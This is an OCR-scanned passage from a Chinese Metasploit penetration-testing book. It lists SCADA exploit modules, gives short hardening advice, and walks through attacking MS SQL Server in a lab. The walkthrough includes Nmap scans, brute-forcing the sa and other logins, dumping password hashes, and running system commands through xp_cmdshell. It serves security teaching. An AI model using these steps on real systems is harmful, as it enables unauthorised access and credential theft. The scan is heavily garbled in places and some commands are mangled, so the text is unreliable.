Operator Workstation n/a exploit/windows/browser/teechart. pro.rb Aug. 11, 2011 Aug. 11, 2011 
Beckhoff ITwinCat Click Here auxiliary/dos/scada/beckhoff twincat.rb Sep. 13, 2011 Oct. 10, 2011 
General Electric D20 PLC Press Release — auxiliary/gather/d20pass.rb Jan. 19, 2012 Jan. 19, 2012 
DigitalBond S4 — unstable-modules/auxiliary/d20tftpbd.rb Jan. 19, 2012 Jan. 19, 2012 
: exploit/windows/scada/iconics genbroker.rb Mar. 21, 2011 Jul. 17, 2011 
Iconics Genesis32 IE 1E080-02 boiywihdowayacadaiconics bh setactivexguid.rb |May 5, 2011 May 11, 2011 
Measuresoft ScadaPro Click Here exploit/windows/scada/scadapro cmdexe.rb Sep. 16, 2011 |Sep. 16, 2011 
Moxa Device Manager Try exploit/windows/scada/moxa mdmtool.rb Oct. 20, 2010 Nov. 6, 2010 
RealFlex RealWin SCADA exploit/windows/scada/realwin.rb Sep. 26, 2008 |Sep. 30, 2008 
(CS-11-305-01 — jexploit/windows/scada/realwin scpc initialize.rb Oct. 15, 2010 |Oct. 18, 2010 
CSA-11-313-01 jexploit/windows/scada/realwin scpc initialize rf.rb Oct. 15, 2010 |Oct. 18, 2010 
exploit/windows/scada/realwin scpc txtevent.rb Nov. 18, 2010 Nov. 24, 2010 
CS-11-080-04 ^ exploit/windows/scada/realwin on fc binfile a.rb Mar. 21, 2011 Jun. 19, 2011 
ICSA-11-110-01  jexploit/windows/scada/realwin on fcs login.rb Mar. 21, 2011 Jun. 22, 2011 
Scadatec Procyon Click Here exploit/windows/scada/procyon core server.rb Sep. 8, 2011 |Sep. 12, 2011 
ScadaTEC ModbusTagserver Click Here exploit/windows/fileformat/scadaphone zip.rb Sep. 12, 2011 ,Sep. 13, 2011 
ScadaPhone l r 
Schneider Electric Raan exploit/windows/scada/citect scada odbc.rb Jun. 11, 2008 Nov. 8, 2010 
itectFacilities 
Sielco Sistemi Winlog ICSA-11-017-02  exploit/windows/scada/winlog runtime.rb Jan. 13, 2011 Jun. 21, 2011 
siemens Technomatix FactoryLink ICS-11-080-01 exploit/windows/scada/factorylink cssservice.rb Mar. 25, 2011 Jun. 24, 2011 
ICSA-11-091-01  exploit/windows/scada/factorylink vrn 09.rb Mar. 21, 2011 Jun. 21, 2011 
Unitronics OPC Server n/a exploit/exploits/windows/browser/teechart pro.rb Aug. 11, 2011 Aug. 11, 2011 


Metasploit Modules (Privately Developed and/or Publicly Shared) 


Meno! System / Component seoir Metasploit Module Author Date 
Developer Reference 
DigitalBond — Schneider Modicon Quantum Credential Disclosure pending modiconpass DigitalBond Feb 14, 12 
DigitalBond — Rockwell Automation ControlLogix Ethernet/IP pending ethernetip-multi DigitalBond Feb 14, 12 
DigitalBond — Koyo/DirectLOGIC ECOM Bruteforce pending koyobrute DigitalBond Feb 14, 12 
SecureState  Nmap-like Meterpreter Extension (MSFMap 0.1.0) n/a msfmap Spencer McIntyre — Dec 30, 11 


5.1.4. 使 SCADA 变 得 更 加 安全 


使 SCADA 网 络 更 安全 是 每 一 个 从 事 安全 防护 工作 的 渗透 测试 工程 师 的 首要 目标 。 仔 细 阅 读 
下 面 的 部 分 来 学 习 如 何 才能 实现 SCADA 服 务 的 安全 并 将 其 付 诸 实 现 。 


1. 实现 SCADA 的 安全 
在 实践 中 实现 SCADA 的 安全 是 一 个 很 困难 的 任务 。 不 过 ， 我 们 在 实现 SCADA 系 统 的 安全 时 
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可 以 遵循 以 下 这 些 关键 点 。 


O 要 关注 任何 与 SCADA 网 络 建立 的 连接 ， 并 辨别 出 这 个 访问 是 否 经 过 授权 。 

O 在 无 须 网 络 连接 时 ， 要 确保 所 有 的 网 络 连接 都 被 断 开 。 

O 按照 SCADA 制 造 商 的 要 求 完成 所 有 安全 措施 。 

O 对 内 网 和 外 网 的 系统 都 实现 入侵 防御 检测 ( IDPS ) 技术 ， 并 提供 24 小 时 不 间断 的 事件 监听 。 
O 对 所 有 网 络 基础 设施 进行 记录 ， 为 管理 员 和 其 他 用 户 分 配 不 同 的 用 户 角 色 。 

Q 建立 IRT 队 伍 或 者 蓝 队 来 定期 对 系统 进行 维护 测试。 


2. 对 网 络 进行 约束 


网 络 发 生 的 攻击 事件 通常 与 未 经 授权 的 访问 或 者 多 余 的 开放 服务 等 有 关 。 抵 御 各 种 SCADA 
攻击 的 最 好 办 法 就 是 移 除 或 者 印 载 不 需要 的 服务 。 


性 。 如 果 你 正在 设计 实现 一 个 SCADA 系 统 ， 一定 要 不 断 地 为 你 的 Windows 系 统 安 


9 SCADA 系 统 通常 是 基于 Windows XP 实 现 的 ， 这 加 大 了 系统 遭受 攻击 的 可 能 
装 补丁 ， 这 样 才 能 免 遭 常见 攻击 的 破坏 。 


5.2 数据库 渗透 


学 习 了 对 SCADA 网 络 的 渗透 之 后 ， 接 下 来 我 们 会 开始 对 数据 库 服务 的 测试 。 在 这 部 分 内 容 
中 , 我 们 的 主要 目标 是 测试 数据 库 以 及 测试 后 端的 各 种 漏洞 。 数 据 库 中 包含 了 关键 业务 数据 。 因 
此 如 果 数 据 库 管理 系统 存在 漏洞 ,就 可 能 引起 远程 代码 执行 或 者 整个 网 络 被 渗透 , 从 而 导致 公司 
的 机 密 数 据 汇 露 。 与 金融 交易 、 医 疗 记录 、 犯 罪 记录 、 产 品 、 销 售 、 市 场 营销 等 相关 的 数据 可 能 
被 出 售 给 一 些 别有用心 的 人 ， 这 些 数 据 库 对 于 他 们 来 说 是 相当 有 用 的 。 


为 了 确保 数据 库 是 完全 安全 的 , 我 们 需要 制定 相关 策略 , 采用 各 种 类 型 的 攻击 方式 对 这 些 朋 
务 进 行 测试 。 


*d 


5.2.1 SQL Server 


早 在 1989 年 微软 就 推出 了 它 的 数据 库 。 大 多 数 网 站 如 今 将 最 新 版 本 的 MS SQL Server 作 为 它 
们 的 后 台 。 不 过 ， 如 果 网 站 太 大 或 者 每 天 要 处 理 太 多 的 事务 , 数据库 就 必须 免 于 受到 任何 漏洞 和 
问题 的 困扰 。 


在 本 节 对 数据 库 的 测试 中 , 我 们 将 要 集中 精力 以 一 种 有 效 的 方式 来 测试 数据 库 管 理 系 统 。 默 
认 情 况 下 ，MS SQL 运行 在 TCP 的 1433 端 口 以 及 UDP 的 1434 端 口 。 现 在 开始 测试 在 Windows 8 系统 
上 运行 的 MS SQL Server 2008 , 
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5.2.2 使 用 Nmap 对 SQL Server 进行 踩点 


在 开始 Metasploit 的 核心 模块 之 前 ， 先 来 看 看 使 用 最 流行 的 网 络 扫描 工具 Nmap 都 可 以 获得 ; 
于 SQL 服务 器 的 哪些 信息 。 首 先 使 用 Metasploit 中 自 带 的 ab_nmap 搬 件 。 

现在 快速 打开 一 个 Metasploit 命 令 行 ， 通 过 对 目标 的 1433 端 口 进行 一 次 服务 侦 测 来 完成 对 目 
标 系统 的 SQL Server 踩 点 工作 。 这 个 过 程 如 下 图 所 示 。 


msf > db nmap -sV -p1433 192.168.65.1 

[*] Nmap: Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-27 17:57 UTC 
[*] Nmap: Nmap scan report for 192.168.65.1 

[*] Nmap: Host is up (0.010s latency). 

[*] Nmap: PORT STATE SERVICE VERSION 

[*] Nmap: 1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.0.1600; RTM 
[*] Nmap: MAC Address: 00:50:56:C0:00:08 (VMware) 

[*] Nmap: Service Info: 0S: Windows; CPE: cpe:/o:microsoft:windows 

[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds 

msf » services 


Services 


host port proto name state info 


192.168.65.1 1433 tcp ms-sql-s open Microsoft SQL Server 2008 10.0.1600; RTM 


在 上 面 的 图 中 ， 我 们 测试 了 端口 1433 ， 该 端口 运行 着 一 个 SQL Server 的 TCP 实 例 。 可 以 清楚 
地 看 到 这 个 端口 现在 是 开放 的 。 


接 下 来 检查 是 否 有 一 个 SQL Server 的 UDP 实例 在 目标 上 运行 ， 这 一 点 可 以 通过 一 个 对 UDP 端 
口 1434 的 服务 侦 测 扫描 来 实现 ， 如 下 图 所 示 。 


| 


msf » db nmap -sU -sV -p1434 192.168.65.1 

+] Nmap: Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-27 18:01 UTC 

*] Nmap: Nmap scan report for 192.168.65.1 

*] Nmap: Host is up (0.00095s latency). 

+] Nmap: PORT STATE SERVICE VERSION 

+] Nmap: 1434/udp open ms-sql-m Microsoft SQL Server 10.0.1600.22 (ServerName: WIN8; TCPPort: 1433) 
*]| Nmap: MAC Address: 00:50:56:C0:00:08 (VMware) 

*] Nmap: Service Info: 0S: Windows; CPE: cpe:/o:microsoft:windows 

*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
+] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.17 seconds 

sf » services 


Services 


host port proto name state info 
192.168.65.1 1433 tcp ms-sql-s open Microsoft SQL Server 2008 10.0.1600; RTM 
192.168.65.1 1434 udp ms-sql-m open Microsoft SQL Server 10.0.1600.22 ServerName: WIN8; TCPPort: 1433 


可 以 清楚 地 看 到 ， 当 我 们 试图 对 UDP 端口 1434 进 行 扫描 时 ，Nmap 向 我 们 展示 了 一 些 关 于 目 
标 SQL Server 的 附加 信息 ， 比 如 SQL Server 的 版 本 以 及 服务 器 的 名 称 WIN8。 


现在 使 用 内 置 的 Nmap 脚 本 来 获得 一 些 关 于 目标 数据 库 的 附加 信息 。 
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msf > db nmap -sU --script=ms-sql-info -p1434 192.168.65.1 

Nmap: Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-27 18:13 UTC 
Nmap: Nmap scan report for 192.168.65.1 

Nmap: Host is up (0.0011s latency). 

Nmap: PORT STATE SERVICE 

Nmap: 1434/udp open|filtered ms-sql-m 

Nmap: MAC Address: 00:50:56:C0:00:08 (VMware) 

Nmap: Host script results: 


3 
四 


a Clustered: No 
map done: 1 IP address (1 host up) scanned in 0.58 seconds 


Nmap: 
Nmap: 
> 


Nmap: | ms-sql-info: 

Nmap: | Windows server name: WIN8 

Nmap: | [192.168.65.1XMSSQLSERVER] 

Nmap: | Instance name: MSSQLSERVER 

Nmap: | Version: Microsoft SQL Server 2008 RTM 

Nmap: | Version number: 10.00.1600.00 

Nmap: | Product: Microsoft SQL Server 2008 

Nmap: | Service pack level: RTM 

Nmap: | Post-SP patches applied: No 

Nmap: | TCP port: 1433 

Nmap: | Named pipe: NN192.168.65.1NpipeNsqlNquery 
| 
N 


i um ium iu i iu iu iu im i im iu im iu im ium im iu i imm he 


I) Xe e Eod o3 RR RR RR Ro Ro Ro Ro Roo Ro Xo 


B m m m m ACA MA OMA Mu uM uA PM M Ru M Rm m 


使 用 ms-sql-info 肢 本 将 会 使 Nmap 对 MS SQL 的 扫描 更 加 精确 。 我 们 可 以 看 到 获得 了 更 多 
的 信息 ， 例 如 命名 管道 、 聚 类 分 析 信息 、 实 例 、 版 本 、 产 品 信息 以 及 大 量 的 其 他 信息 。 


5.2.3 ”使 用 Metasploit 的 模块 进行 扫描 


现在 使 用 Metasploit 中 用 于 MS SQL 的 专门 模块 ， 并 查看 通过 这 些 模 块 可 以 帮助 我 们 获得 
哪些 信息 。 要 使 用 的 第 一 个 辅助 模块 是 ms sql_ping， 这 个 模块 会 收集 一 些 其 他 的 服务 信息 。 


好 的 ， 现 在 载 人 这 个 模块 并 开始 这 次 扫描 ， 如 下 图 所 示 。 


msf > use auxiliary/scanner/mssql/mssql ping 

msf  auxiliary(mssql ping) > set RHOSTS 192.168.65.1 
RHOSTS => 192.168.65.1 

msf  auxiliary(mssql ping) > run 


[*] SQL Server information for 192.168.65.1: 


ServerName = WINS 

InstanceName = MSSQLSERVER 
IsClustered - No 

Version = 10.0.1600.22 

tcp = 1433 

np = \\WIN8\pipe\sql\query 


[*] Scanned 1 of 1 hosts (1005 complete) 
[*] Auxiliary module execution completed 
msf auxiliary(mssql ping) > J 


正如 上 图 所 示 ， 我 们 获得 了 几乎 完全 相同 的 信息 。 但 是 与 Nmap 相 比 ，Metasploit 辅 助 模块 返 
回 的 结果 显然 可 读 性 更 强 。 来 用 MSF 模块 完成 一 些 Nmap 无 法 完成 的 任务 。 
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5.2.4 ”暴力 破解 密码 


在 渗透 测试 数据 库 中 的 下 一 步 是 对 身份 验证 模式 进行 精确 的 检测 。 


为 mssql_login 的 内 置 模块 。 我 们 作为 身份 验证 的 测试 者 ， 
库 中 的 用 户 名 和 密码 进行 暴力 破解 。 


现在 载 人 这 个 模块 并 分 析 这 


结果 。 


Metasploit 中 含有 一 个 名 
可 以 使 用 这 个 模块 来 对 MS SQL 数据 


一 -一 = 一 一 
msf > use auxiliary/scanner/mssql/mssql login 
msf 
RHOSTS => 192.168.65.1 

msf auxiliary(mssql login) > run 


192.168.65.1:1433 - MSSQL - successful login 

Scanned 1 of 1 hosts (1005 complete) 

Auxiliary module execution completed 
auxiliary(mssql login) > J 


auxiliary(mssql login) » set RHOSTS 192.168. 


[*] 192.168.65.1:1433 - MSSQL - Starting authentication scanner. 
[*] 192.168.65.1:1433 MSSQL - [1/2] - Trying username:' 


65.1 


sa' with password:'"' 
'sa' ra 


运行 了 这 个 模块 之 后 , E 
是 sa， ise. 如 果 使 用 这 个 组 合成 功 登录 ， 


会 首先 使 用 系统 的 默认 用 户 名 和 密码 进 和 


和 测试 。 这 个 默认 用 户 名 就 
我 们 就 可 以 知道 默认 的 用 户 名 和 密码 


还 在 使 用 之 中 。 此 外 , 如 果 使 用 sa 账户 并 不 能 
测试 。 为 了 完成 这 项 任务 ， 我 们 将 参数 US 


ER FIL 


成 功 登录 , 那 


E 和 PASS_FILE 


么 就 需要 使 用 更 多 的 登录 凭证 去 进行 
的 值 分 别 设置 为 进行 破解 所 要 


使 用 的 用 户 名 和 密码 字典 文件 的 名 字 ， 然 后 对 DBMS 的 用 户 名 和 密码 进行 暴力 破解 。 


msf > use auxiliary/scanner/mssqUmssql login 
msf auxiliary(mssql login) > show options 
Module options (auxiliary/scanner/mssql/mssql login): 

Name Current Setting Required Description 

BLANK ， PASSWORDS true no Try blank passwords for all users 

BRUTEFORCE | SPEED 5 yes How fast to bruteforce, from 0 to 5 

PASSWORD no A specific password to authenticate with 

PASS FILE no File containing passwords, one per line 

RHOSTS yes The target address range or CIDR identifier 

RPORT 1433 yes The target port 

STOP ON SUCCESS false yes Stop guessing when a credential works for a host 

THREADS 1 yes The number of concurrent threads 

USERNAME sa no A specific username to authenticate as 

USERPASS FILE no File containing users and passwords separated by space, one pair per | 
ne 

USER AS PASS true no Try the username as the password for all users 

USER FILE no File containing usernames, one per line 

USE WINDOWS AUTHENT false yes Use windows authentification 

VERBOSE true yes Whether to print output for all attempts 

JU» - SE mI LO M 米 

来 设 定 渗透 需要 的 几 个 参数 : USER_FILE、PASS_FILE 以 及 RHOSTS。 只 有 设 定 了 这 些 参数 ， 


模块 才能 正常 运行 。 我 们 对 这 几 个 参数 进行 如 下 设置 。 


msf auxiliary(mssql login) > set USER FILE user.txt 
USER FILE => user.txt 
msf auxiliary(mssql login) > set PASS FILE pass.txt 
PASS FILE -» pass.txt 
msf auxiliary(mssql login) > set RHOSTS 192.168.65.1 
RHOSTS -» 192.168.65.1 

msf auxiliary(mssql login) » 
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现 使 用 这 个 模块 来 对 目标 数据 库 服务 器 进 


行 攻 击 ， 输 出 如 下 图 所 示 。 


*] 192.168.65.1:1433 MSSQL - [02/36] - Trying username:'sa ' with password:'' 
192.168.65.1:1433 - MSSQL - successful login 'sa ' : '' 
*] 192.168.65.1:1433 MSSQL - [03/36] - Trying username:'nipun' with password:'' 
[-] 192.168.65.1:1433 MSSQL - [03/36] - failed to login as 'nipun' 
*] 192.168.65.1:1433 MSSQL - [04/36] - Trying username:'apex' with password:'' 

[-] 192.168.65.1:1433 MSSQL - [04/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [05/36] - Trying username:'nipun' with password: 'nipun' 
[-] 192.168.65.1:1433 MSSQL - [05/36] - failed to login as 'nipun' 

*] 192.168.65.1:1433 MSSQL - [06/36] - Trying username:'apex' with password: 'apex' 

[-] 192.168.65.1:1433 MSSQL - [06/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [07/36] - Trying username:'nipun' with password: '12345' 
192.168.65.1:1433 - MSSQL - successful login 'nipun' : '12345' 

*] 192.168.65.1:1433 MSSQL - [08/36] - Trying username:'apex' with password:'12345' 
[-] 192.168.65.1:1433 MSSQL - [08/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [09/36] - Trying username:'apex' with password: '123456' 
[-] 192.168.65.1:1433 MSSQL - [09/36] - failed to login as 'apex' 

*] 192.168.65.1:1433 MSSQL - [10/36] - Trying username:'apex' with password:'18101988' 
[-] 192.168.65.1:1433 MSSQL - [10/36] - failed to login as 'apex' 
*] 192.168.65.1:1433 MSSQL - [11/36] - Trying username:'apex' with password:'12121212' 

L-1 192.168.65.1:1433 MSSQI - [11/361 - failed to laain as 'anex* 


正如 上 面 的 结果 展示 的 ,我 们 看 到 了 两 条 与 数据 库 相 匹配 的 用 户 名 和 密码 信息 ， 


凭证 。 


5.2.5 查找 /捕获 服务 器 的 口令 


默认 用 户 名 sa， 它 的 密码 为 空 。 另 外 ， 还 发 现 了 另 一 个 用 户 名 为 nipun、 蜜 码 为 1 


D es 


现在 我 们 已 经 取得 了 sa 和 nipun 两 个 数据 库 用 户 的 登录 凭 


其 他 用 户 的 登录 赁 


撒 证 。 接 下 来 通过 


二 使 用 其 中 一 个 来 获 


万 证 。 可 以 使 用 mssql_hashdump 模 块 来 完成 这 个 任务 。 让 我 们 查看 这 个 模块 


的 工作 过 程 ， 


并 从 这 个 模块 成 功 完成 后 提供 的 所 有 信息 中 进 和 


了 调查 。 


ud 
msf 
RHOSTS => 192.168.65.1 
Imsf 


[*] Instance Name: nil 


ee270 


60358067 


Name 
PASSWORD 
RHOSTS 192.168.65.1 
RPORT 1433 
THREADS A 
USERNAME 
USE WINDOWS AUTHENT Titei 
ption set) 
Imsf auxiliary(mssql hashdump) > run 


[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 
mst auxiliary(mssql hashdump) > 目 


192.168.65.1:1433 - Saving mssql05.hashes 


192.168.65.1:1433 - Saving mssql05.hashes 
3db291c6737f1efb8e4a481b02284215913f 
192.168.65.1:1433 - Saving mssql05.hashes 
b79ed321563aldccdc9cfc5ffos54dd2dof 
192.168.65.1:1433 - Saving mssql05.hashes 


» use auxiliary/scanner/mssql/mssql hashdump 
auxiliary(mssql hashdump) > set RHOSTS 192.168.65.1 


auxiliary(mssql hashdump) » show options 


Module options (auxiliary/scanner/mssql/mssql hashdump): 


Current Setting Required Description 


password for the specified username 

target address range or CIDR identifier 
target port 

number of concurrent threads 

username to authenticate as 

windows authentification (requires DOMAIN o 


sa:0100937f739643eebf33bc464cc6ac8d2fda70f31c6d5c8 
##MS_ PolicyEventProcessingLoginzz:01003869d680adf6 
##MS PolicyTsqlExecutionLoginzz:01008d22a249df5ef3 


nipun:01004bd5331c2366db85cb0de6eaf12ac1c91755b116 
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我 们 已 经 获得 数据 库 服务 器 中 其 他 用 户 密码 的 哈 希 值 。 现在 可 以 使 用 第 三 方 工具 来 对 这 些 哈 
希 值 进行 破解 ， 这 样 就 可 以 提升 权限 或 者 获得 其 他 数据 库 和 表 的 权限 。 


5.2.6 浏览 SQL Server 


我 们 在 上 一 节 中 取得 了 目标 数据 库 的 用 户 名 和 密码 。 现 在 可 以 登录 到 这 个 服务 器 上 ， 从 该 数 
据 库 收集 重要 的 信息 ， 比 如 存储 过 程 、 数 据 库 的 数量 和 名 称 、 可 登录 到 数据 库 的 Windows 组 、 数 
据 库 中 的 文件 以 及 一 些 参数 。 


为 了 实现 这 个 目的 , 可 以 使 用 mssql_enum。 接 下 来 看 看 如 何在 目标 数据 库 上 运行 这 个 模块 。 


msf > use auxiliary/admin/mssql/mssql enum 
msf  auxiliary(mssql enum) > show options 


Module options (auxiliary/admin/mssql/mssql enum): 


Name Current Setting Required Description 

PASSWORD no The password for the specif 
ied username 

Proxies no Use a proxy chain 

RHOST yes The target address 

RPORT 1433 yes The target port 

USERNAME sa no The username to authenticat 
e as 

USE WINDOWS AUTHENT false yes Use windows authentificatio 


n (requires DOMAIN option set) 


msf  auxiliary(mssql enum) > set USERNAME nipun 
USERNAME => nipun 

msf  auxiliary(mssql enum) > set password 123456 
password -» 123456 

msf auxiliary(mssql enum) > runi 


当 mssql_enum 运 行 起 来 之 后 ， 就 可 以 收集 到 该 数据 库 的 大 量 信息 。 来 看 看 它 都 为 我 们 提供 
了 什么 信息 。 


XE 


msf auxiliary(mssql enum) > set RHOST 192.168.65.1 

RHOST -» 192.168.65.1 

msf auxiliary(mssql enum) > run 

[*] Running MS SQL Server Enumeration... 

[*] Version: 

[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) 
[*] Jul 9 2008 14:43:34 

[*] Copyright (c) 1988-2008 Microsoft Corporation 

[*] Developer Edition on Windows NT 6.2 «X86» (Build 9200: ) 
[*] Configuration Parameters: 

[*] C2 Audit Mode is Not Enabled 

[*] xp_cmdshell is Enabled 

[*] remote access is Enabled 

[*] allow updates is Not Enabled 

[*] Database Mail XPs is Not Enabled 

[*] Ole Automation Procedures are Enabled 

[*] Databases on the server: 

[*] Database name:master 

[*] Database Files for master: 

[*] C:\Program Files\Microsoft SQL Server\MSSQL10 .MSSQLSERVER\MSS( 
L\DATA\master .mdf 
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正如 我 们 看 到 的 那样 ,这 个 模块 几乎 展示 了 数据 库 的 所 有 信息 , 例如 存储 过 程 、 数 据 库 的 名 
称 和 数量 、 被 禁用 的 账户 ， 等 等 。 


我 们 将 会 在 5.2.7 节 的 第 一 部 分 中 看 到 如 何 绕 过 一 些 禁 用 的 存储 过 程 。 另 外 , 如 xp_cmashel1 
之 类 的 过 程 可 能 会 导致 整个 数据 库 被 渗透 。 可 以 从 上 面 的 图 中 看 到 该 服务 器 中 xp_cmdashel11 是 
可 用 的 。 接 着 我 们 查看 mssql_enum 模 块 还 提供 了 哪些 信息 。 


ASSET N 
[*] System Admin Logins on this Server: 
[*] sa 
[*] NT AUTHORITY\SYSTEM 
[*] NT SERVICE\MSSQLSERVER 
[*] win8\Nipun 
[*1 NT SERVICEXSQLSERVERAGENT 
[*] nipun 
[*] Windows Logins on this Server: 
[*] NT AUTHORITY\SYSTEM 
[*] win8\Nipun 
[*] Windows Groups that can logins on this Server: 
[*] NT SERVICE\MSSQLSERVER 
[*] NT SERVICE\SQLSERVERAGENT 
[*] Accounts with Username and Password being the same: 
[*1 No Account with its password being the same as its username was found. 


[*] Accounts with empty password: 


[*] Stored Procedures with Public Execute Permission found: 
] sp replsetsyncstatus 

] sp replcounters 

] sp. replsendtoqueue 

] sp resyncexecutesql 

] sp prepexecrpc 

] sp repltrans 

] sp xml preparedocument 
] xp qv 

] xp getnetname 

] sp. releaseschemalock 
] sp. refreshview 
] sp replcmds 
] sp unprepare 
] sp resyncprepare 


可 以 从 上 面 的 屏幕 截图 中 看 到 大 量 的 信息 。 这 里 面包 括 了 一 个 存储 过 程 的 列表 , 一 些 密码 为 
空 的 账户 ， 数 据 库 的 Windows 登 录 名 以 及 管理 员 登 录 名 。 


5.2.7 后 渗透 /执行 系统 命令 


在 收集 够 了 关于 目标 的 信息 以 后 , 让 我 们 在 目标 数据 库 上 完成 一 些 后 渗透 攻击 。 为 了 完成 后 
渗透 攻击 , 可 以 使 用 两 个 不 e 分 方便 的 模块 。 第 一 个 要 使 用 的 模块 是 mssql_sal, 凭借 它 
将 可 以 在 数据 库 上 运行 SQL 查询 。 第 二 个 要 使 用 的 模块 是 mssal_exec， 它 可 以 启用 已 经 被 禁用 
的 xp_cmdqshel11， 从 而 人 允许 执行 系统 级 的 命令 。 


1. 重新 载 入 xp_cmdshe11 功 能 


模块 mssal_exec 将 会 通过 重新 载 人 禁用 的 xpb_cmqshel1 功 能 来 运行 系统 级 的 命令 。 这 个 模 
块 需要 设置 要 执行 的 系统 命令 的 cCMD 选 项 。 让 我 们 查看 一 下 这 个 过 程 。 
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msf > use auxiliary/admin/mssql/mssql exec 
ms 上 auxiliary(mssql exec) > set CMD 'ipconfig' 
CMD —» ipconfig 

msf auxiliary (mssql exec) > run 


[*] 202.165.236.2:1433 - The server may have xp cmdshell disabled, t 
rying to enable it... 

[*] 202.165.236.2:1433 - SQL Query: EXEC master..xp cmdshell 'ipconf 
ig' 


完成 了 mssql_exec 模 块 的 运行 之 后 ， 屏 幕 上 将 会 显示 出 如 下 图 所 示 的 结果 。 


Connection-specific DNS Suffix 
Connection-specific DNS Suffix 

Default Gateway . 

Default Gateway . 

Default Gateway . . . . . . . a’ l 

Default Gateway . . . . . . . . . : 192.168.43.1 


IPv4 Address. . . o . . . . a : 192.168.19.1 

IPv4 Address. . . . . . . . . . . : 192.168.43.240 

IPv4 Address. . . Rh Fh uun gna : 192.168.56.1 

IPv4 Address. . . oa s 52 192.158.65.1 

Link-local IPv6 Address 5. 55 t fe80::59c2:8146:3f3d:6634526 
Link-local IPv6 Address . . . . . : fe80::9ab:3741:e9f0:b74d*:12 
Link-local IPv6 Address . . . . . : fe80::9dec:d1ae:5234:bd41*524 
Link-local IPv6 Address . . . . . : fe80::c83f :ef41:214b:bc3e*521 
Media State 5 5. 5. : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State. . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Media State . . . . . . . . . . . : Media disconnected 

Subnet Mask . . . sa sa sa s» E 255.255.255.0 

Subnet Mask . . . . . sn . . aG : 255.255.255.0 

Subnet Mask . . . sa co ny pao : 255.255.255.0 

Subnet Mask . . . . . . . . . . . : 255.255.255.0 


结果 窗口 中 清楚 地 显示 了 对 目标 数据 库 服 务 器 成 功 执行 的 系统 命 
运行 SQL 查询 命令 


可 以 使 用 mssql_sal1 模 块 对 目标 数据 库 服 务 需 执行 SQL 查询 命令 。 你 只 需 将 SQL 参数 的 值 设 
定 为 一 条 有 效 的 数据 库 查询 命令 ， 这 条 命令 就 会 被 执行 ， 如 下 图 所 示 。 


msf > use auxiliary/admin/mssql/mssql sql 
msf  auxiliary(mssql sql) > run 


[*] SQL Query: select @@version 
[*] Row Count: 1 (Status: 16 Command: 193) 


NULL 
Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) 
Jul 9 2008 14:43:34 
Copyright (c) 1988-2008 Microsoft Corporation 
Developer Edition on Windows NT 6.2 «X86» (Build 9200: ) 


[*] Auxiliary module execution completed 
msf  auxiliary(mssql sql) > 
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将 SQL 参数 的 值 设 置 为 select eeversion。 数 据 库 成 功 执行 这 条 查询 命令 之 后 ， 我 们 就 可 
以 获悉 这 个 数据 库 的 版 本 了 。 


按照 之 前 的 步骤 ， 可 以 使 用 Metasploit 来 测试 出 各 种 数据 库 的 漏洞 。 


e» 推荐 一 个 对 MySQL 进 行 渗透 测试 的 优质 学 习 资 源 : http;//pentestlab.wordpress. 
com/212/7/27/attacking-mysql-with-metasploit/。 


5.3 VOIP 渗透 测试 
现在 的 重点 是 测试 支持 VOIP 的 服务 ， 并 学 习 如 何 找 到 可 能 影响 VOIP 服 务 的 各 种 漏洞 。 


5.3.1 VOIP 的 基本 原理 


相 比 传统 的 电话 服务 ，VOIP 的 价格 要 低廉 很 多 。 相 比 传统 的 电信 业务 ，VOIP 更 加 灵活 ， 也 
提供 了 各 种 特性 ， 例 如 多 样 的 扩展 性 、 来 电 显示 服务 、 日 志 服 务 、 每 次 通话 的 录音 ， 等 等 。 最 近 
许多 公司 都 推出 了 用 于 人’ 电话 服 务 的 专用 交换 机 ( Private Branch eXchange,PBX ). 


无 论 是 传统 的 还 是 现代 的 电话 系统 在 面 对 物 理 线路 的 攻击 时 都 还 显得 十 分 脆弱 。 例如 , 一 个 
攻击 者 改变 了 电话 线路 的 连接 情况 , 将 受害 者 的 电话 线路 连接 到 了 自己 这 里 。 他 将 可 以 使 用 自己 
的 设备 接听 本 来 是 打 给 受害 者 的 电话 , 也 能 够 以 受害 者 的 号 码 拨打 外 部 的 电话 , 同样 可 以 使 用 这 
个 线路 来 上 网 或 者 发 送 、 接 收 传真 。 

在 对 VOIP 进行 渗透 的 时 候 ， 可 以 不 用 改变 受害 者 的 电话 线路 。 不 过 ， 如 果 你 并 不 了 解 关 于 
VOIP 的 基础 知识 以 及 工作 原理 ， 那 么 这 次 渗透 将 会 是 十 分 困难 的 工作 。 这 部 分 内 容 将 会 向 我 们 
旨 明 如 何在 不 挟持 电话 线路 的 情况 下 成 功 渗透 一 个 VOIP 网 络 。 

1. PBX 简 介 

在 中 小 型 企业 中 ，PBX 是 一 个 性 价 比 很 高 的 电话 通信 和 解决 方案 。 因 为 它 非常 灵活 ， 实 现 了 各 
房间 和 各 楼 层 之 间 的 通信 。 大 型 公司 也 可 能 会 选择 PBX,， 主要 因为 要 将 每 一 条 电话 线路 单独 与 外 
界 联通 是 一 项 很 麻烦 的 工作 。 一 个 PBX 包 括 以 下 几 个 部 分 。 

O 连接 到 PBX 上 的 电话 中 继 线 。 

口 一 台 用 来 管理 所 有 通过 PBX 打 进 或 打出 的 电话 的 计算 机 。 
口 PBX 通 信 线 路 网 络 。 

口 一 个 手动 操作 的 控制 台 或 者 总 机 。 


2. VOIP 服务 的 类 型 
